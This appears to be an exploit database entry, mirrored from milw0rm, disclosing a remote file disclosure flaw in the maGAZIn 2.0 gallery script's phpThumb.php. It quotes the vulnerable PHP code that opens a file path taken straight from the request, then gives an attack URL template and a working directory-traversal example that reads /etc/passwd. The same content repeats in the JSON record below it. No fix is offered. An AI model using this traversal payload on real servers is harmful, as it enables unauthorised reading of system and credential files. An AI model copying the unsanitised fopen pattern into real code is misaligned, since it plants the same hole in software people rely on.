Search...

maGAZIn 2.0 - PHPThumb.php?src Remote File Disclosure

2007-05-11T00:00:00

ID EXPLOITPACK:E3E5BAB07A1DBF960D856F2D72A15CF8
Type exploitpack
Reporter Dj7xpl
Modified 2007-05-11T00:00:00

Description

maGAZIn 2.0 - PHPThumb.php?src Remote File Disclosure

                                        
                                                    \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   maGAZIn v2.0
[!] Download :   http://www.pinkcrow.net/Scripts/gallery.php
[!] Type     :   Remote File Disclosure Vulnerability

---------------------------------------------------------------------

---------------------------------------------------------------------

Vuln Code :  Line (152 - 157)

[Code]
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
		$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
		fclose($fp);
	} else {
		ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
	}
[/Code]

---------------------------------------------------------------------

---------------------------------------------------------------------

Bug :

http://[Target]/[Path]/phpThumb.php?src=[Local File]

Example :

http://Target.ir/Gallery/phpThumb.php?src=../../../etc/passwd

---------------------------------------------------------------------

# milw0rm.com [2007-05-11]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T20:40:59", "references": [], "description": "\nmaGAZIn 2.0 - PHPThumb.php?src Remote File Disclosure", "edition": 1, "reporter": "Dj7xpl", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2007-05-11T00:00:00", "title": "maGAZIn 2.0 - PHPThumb.php?src Remote File Disclosure", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T20:40:59", "rev": 2}, "score": {"value": -0.7, "vector": "NONE", "modified": "2020-04-01T20:40:59", "rev": 2}, "vulnersScore": -0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2007-05-11T00:00:00", "id": "EXPLOITPACK:E3E5BAB07A1DBF960D856F2D72A15CF8", "href": "", "viewCount": 1, "sourceData": " \\\\\\|///\n \\\\ - - //\n ( @ @ )\n----oOOo--(_)-oOOo---------------------------------------------------\n\n[ Y! Underground Group ]\n[ Dj7xpl@yahoo.com ]\n[ Dj7xpl.2600.ir ]\n\n----ooooO-----Ooooo--------------------------------------------------\n ( ) ( )\n \\ ( ) /\n \\_) (_/\n\n---------------------------------------------------------------------\n\n[!] Portal : maGAZIn v2.0\n[!] Download : http://www.pinkcrow.net/Scripts/gallery.php\n[!] Type : Remote File Disclosure Vulnerability\n\n---------------------------------------------------------------------\n\n---------------------------------------------------------------------\n\nVuln Code : Line (152 - 157)\n\n[Code]\nif ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {\n\t\t$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));\n\t\tfclose($fp);\n\t} else {\n\t\tErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);\n\t}\n[/Code]\n\n---------------------------------------------------------------------\n\n---------------------------------------------------------------------\n\nBug :\n\nhttp://[Target]/[Path]/phpThumb.php?src=[Local File]\n\nExample :\n\nhttp://Target.ir/Gallery/phpThumb.php?src=../../../etc/passwd\n\n---------------------------------------------------------------------\n\n# milw0rm.com [2007-05-11]", "cvss": {"score": 0.0, "vector": "NONE"}}